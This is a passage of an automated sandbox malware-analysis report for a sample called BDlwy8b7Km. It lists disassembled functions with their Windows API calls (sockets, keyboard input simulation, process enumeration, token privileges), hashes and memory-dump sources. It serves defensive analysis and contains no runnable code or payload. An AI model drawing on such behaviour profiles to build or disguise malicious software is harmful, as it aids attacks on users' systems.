                                                  • API String ID: 314563124-0
                                                  • Opcode ID: f3f0b8e0dfa092ca74f8226147ce890ff0fde6cec801e48045add6e1fad44442
                                                  • Instruction ID: eeab1a66e253fea1434b608d6cac6eefe7b842c4d4142567cd2b60b578a2769f
                                                  • Opcode Fuzzy Hash: f3f0b8e0dfa092ca74f8226147ce890ff0fde6cec801e48045add6e1fad44442
                                                  • Instruction Fuzzy Hash: 88810B71A00109EFCF04DF94C988DEEBBB9FF89315F144558E606AB291DB75AE06CB60
                                                  Function 005D1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: cd3d6b3917a9c03b94b0e067ad3cbb9719837307669350805f47d90e0fe5d6f8
                                                  • Instruction ID: 899989fe0f506c52493a3a6755cd14b4dd56b8d2523fce2ebfb5ba630fbfd5d0
                                                  • Opcode Fuzzy Hash: cd3d6b3917a9c03b94b0e067ad3cbb9719837307669350805f47d90e0fe5d6f8
                                                  • Instruction Fuzzy Hash: 42413835600D02BBDF356BFC9C4AAAE7EA5FF81330F14062BF419D6392E67448415766
                                                  Function 00626278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(0163D080,?), ref: 006262E2
                                                  • ScreenToClient.USER32(?,?), ref: 00626315
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00626382
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: c55736043e421931dff06f57b58bc9fdcb2c2c45c1b09102239184a797eea780
                                                  • Instruction ID: 5a54c34c659f77f8dd96c640c2547673ac6f6a2e8db8bcf4bf28ef99ce20bc6f
                                                  • Opcode Fuzzy Hash: c55736043e421931dff06f57b58bc9fdcb2c2c45c1b09102239184a797eea780
                                                  • Instruction Fuzzy Hash: 59510974A00619EFDF20DF68E881AEE7BB6EF45360F109259F9159B290D770AE41CF90
                                                  Function 00611AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00611AFD
                                                  • WSAGetLastError.WSOCK32 ref: 00611B0B
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00611B8A
                                                  • WSAGetLastError.WSOCK32 ref: 00611B94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$socket
                                                  • String ID:
                                                  • API String ID: 1881357543-0
                                                  • Opcode ID: cd8d73d4cd827c07cb83d3bf0c40fab5ff9a00127fb3459f57eda8399f8db9a6
                                                  • Instruction ID: 43ec8d8a7a904bad69af8e399448080a8e7a784e96e247a33ac1efea424df78d
                                                  • Opcode Fuzzy Hash: cd8d73d4cd827c07cb83d3bf0c40fab5ff9a00127fb3459f57eda8399f8db9a6
                                                  • Instruction Fuzzy Hash: 2A41A7356002016FEB209F24C88AF697BE5BB85718F54C458F6199F7D2D771ED42CB90
                                                  Function 005CB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4e01d4e625f439236090fbf87bce40b29d871fe4916fee3e254c9b65fd44120f
                                                  • Instruction ID: c2feaf06b98bc45ea7b4898a811503e0e778be1b905646064fd2f1c5dfefac94
                                                  • Opcode Fuzzy Hash: 4e01d4e625f439236090fbf87bce40b29d871fe4916fee3e254c9b65fd44120f
                                                  • Instruction Fuzzy Hash: 0A41D675A04705BFE7289FB8CC86FAABFAAFB84710F10452EF141DB281D77199018790
                                                  Function 006056D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00605783
                                                  • GetLastError.KERNEL32(?,00000000), ref: 006057A9
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006057CE
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006057FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: 1bf74683abbade38a01ff14f8b64f340003bdaefef442abbaab8506b3c81a0ed
                                                  • Instruction ID: 42068c0fb7ab2c5af2c59197040e65e45e3bafbd69de4cb8e3780a3fbe6071a0
                                                  • Opcode Fuzzy Hash: 1bf74683abbade38a01ff14f8b64f340003bdaefef442abbaab8506b3c81a0ed
                                                  • Instruction Fuzzy Hash: 7B411A35604A15DFCF15DF15C548A5EBBE2BF89320B198489E84AAB3A2DB34FD01CF91
                                                  Function 005CD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,005B6D71,00000000,00000000,005B82D9,?,005B82D9,?,00000001,005B6D71,?,00000001,005B82D9,005B82D9), ref: 005CD910
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005CD999
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005CD9AB
                                                  • __freea.LIBCMT ref: 005CD9B4
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: 0dcb526d04021cabd8df79010fa09299ffd0271decc6ab92844d2aa9dfc902b9
                                                  • Instruction ID: d218e9a872d5f0dd4e5d62c2f2da1f744f14f413fe8027bd63e33d891e20e8e7
                                                  • Opcode Fuzzy Hash: 0dcb526d04021cabd8df79010fa09299ffd0271decc6ab92844d2aa9dfc902b9
                                                  • Instruction Fuzzy Hash: AD319972A0020AAFDB249FA4DC85EAE7FB5EB81350B05426CFC04D6291EB35DD51CBA0
                                                  Function 006252C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00625352
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00625375
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00625382
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006253A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$InvalidateMessageRectSend
                                                  • String ID:
                                                  • API String ID: 3340791633-0
                                                  • Opcode ID: d2431314450ec784b7c429989e21b89b6959a3fc7a6c4a3b28e4b6d6622ad29f
                                                  • Instruction ID: f9b96e6c1486badf01866c287b443fae409befc9d8c7f32330622154c805b616
                                                  • Opcode Fuzzy Hash: d2431314450ec784b7c429989e21b89b6959a3fc7a6c4a3b28e4b6d6622ad29f
                                                  • Instruction Fuzzy Hash: EF31C434A55E28EFEF30DB14EC05BE83767AB053A0F586101FA12963E1E7B49D419F92
                                                  Function 005FAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 005FABF1
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 005FAC0D
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 005FAC74
                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 005FACC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 3a776301848f584cdb7b9c8d3276a0ea871746d1f58244fc4428a8a0a84bb648
                                                  • Instruction ID: bc9ce6044fe0bff31881554f22733da9b3adc03090ad681a704626afd9574f5d
                                                  • Opcode Fuzzy Hash: 3a776301848f584cdb7b9c8d3276a0ea871746d1f58244fc4428a8a0a84bb648
                                                  • Instruction Fuzzy Hash: AB31E5B0A4061CAFFB358B6588187FE7EA6BB89320F04461AF689521D1C37D8D858753
                                                  Function 00627674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0062769A
                                                  • GetWindowRect.USER32(?,?), ref: 00627710
                                                  • PtInRect.USER32(?,?,00628B89), ref: 00627720
                                                  • MessageBeep.USER32(00000000), ref: 0062778C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: b02d047536fc4a25eaa788ff019d987aa115a9b189e221f559ef21ce37e0f4d6
                                                  • Instruction ID: f65eb05901d975e8b6582abb57ab5d6d471bb571a38182bd819faafbb0b2bbb4
                                                  • Opcode Fuzzy Hash: b02d047536fc4a25eaa788ff019d987aa115a9b189e221f559ef21ce37e0f4d6
                                                  • Instruction Fuzzy Hash: 68419834A09A25DFCB11CF58E894EA9B7F6BF49314F1881A8E8149B361C371E942CF90
                                                  Function 006216DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 006216EB
                                                    • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                                                    • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                                                    • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
                                                  • GetCaretPos.USER32(?), ref: 006216FF
                                                  • ClientToScreen.USER32(00000000,?), ref: 0062174C
                                                  • GetForegroundWindow.USER32 ref: 00621752
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 99a19401e422e7fe2c4f5ab9c8429a3f33fa905f0fe269c4cb2404bab0506d59
                                                  • Instruction ID: 7e2cb1953ca957241d34d69a072532e8fb84301c6108f97576893c62a8282514
                                                  • Opcode Fuzzy Hash: 99a19401e422e7fe2c4f5ab9c8429a3f33fa905f0fe269c4cb2404bab0506d59
                                                  • Instruction Fuzzy Hash: 8F313E71D00549AFDB10EFAAC8858AEBBF9FF89304B50806AE415E7211E7319E45CFA0
                                                  Function 005FD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 005FD501
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 005FD50F
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 005FD52F
                                                  • CloseHandle.KERNEL32(00000000), ref: 005FD5DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: ab4758297a89e8e13794f987df37368391cf006d4015d34df1c47af9c118e723
                                                  • Instruction ID: 2060fd762761da808b0b9fa9968a0f2e04911e09379320f4277318e00f259f34
                                                  • Opcode Fuzzy Hash: ab4758297a89e8e13794f987df37368391cf006d4015d34df1c47af9c118e723
                                                  • Instruction Fuzzy Hash: 63318B310083059FD701EF64C889ABEBFF9BFD9354F10092DF681821A1EB619949CBA2
                                                  Function 00628FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • GetCursorPos.USER32(?), ref: 00629001
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005E7711,?,?,?,?,?), ref: 00629016
                                                  • GetCursorPos.USER32(?), ref: 0062905E
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005E7711,?,?,?), ref: 00629094
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 3da15508689d73bc5fa5883cfe3a2bc9b5853500cc80126969e6d2aae38e6669
                                                  • Instruction ID: f7c6f9672cc6ed8f542fb3aa2f9c79e7ce1e35bb384e3e3aa4ecc01c5438983f
                                                  • Opcode Fuzzy Hash: 3da15508689d73bc5fa5883cfe3a2bc9b5853500cc80126969e6d2aae38e6669
                                                  • Instruction Fuzzy Hash: 4F21AD31600428AFCB298F94D858EEA3BBAFF8A360F044159F9059B2A1C3319951DF60
                                                  Function 005FD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,0062CB68), ref: 005FD2FB
                                                  • GetLastError.KERNEL32 ref: 005FD30A
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 005FD319
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0062CB68), ref: 005FD376
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: a1ccc0d9253121d1186f86c6a307fe4ee1b3e5e01c4068b69d3059518fe5cade
                                                  • Instruction ID: fd0261c4fe925718c8b8bd7f137be0b4b6b23671d9c11d32f1fc4c0dc2bc786f
                                                  • Opcode Fuzzy Hash: a1ccc0d9253121d1186f86c6a307fe4ee1b3e5e01c4068b69d3059518fe5cade
                                                  • Instruction Fuzzy Hash: 59219E705052069FC710DF28C8858AE7BE6BE95324F104E1DF699C32E1DB349A06CBA3
                                                  Function 005F1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005F102A
                                                    • Part of subcall function 005F1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005F1036
                                                    • Part of subcall function 005F1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1045
                                                    • Part of subcall function 005F1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005F104C
                                                    • Part of subcall function 005F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1062
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005F15BE
                                                  • _memcmp.LIBVCRUNTIME ref: 005F15E1
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F1617
                                                  • HeapFree.KERNEL32(00000000), ref: 005F161E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
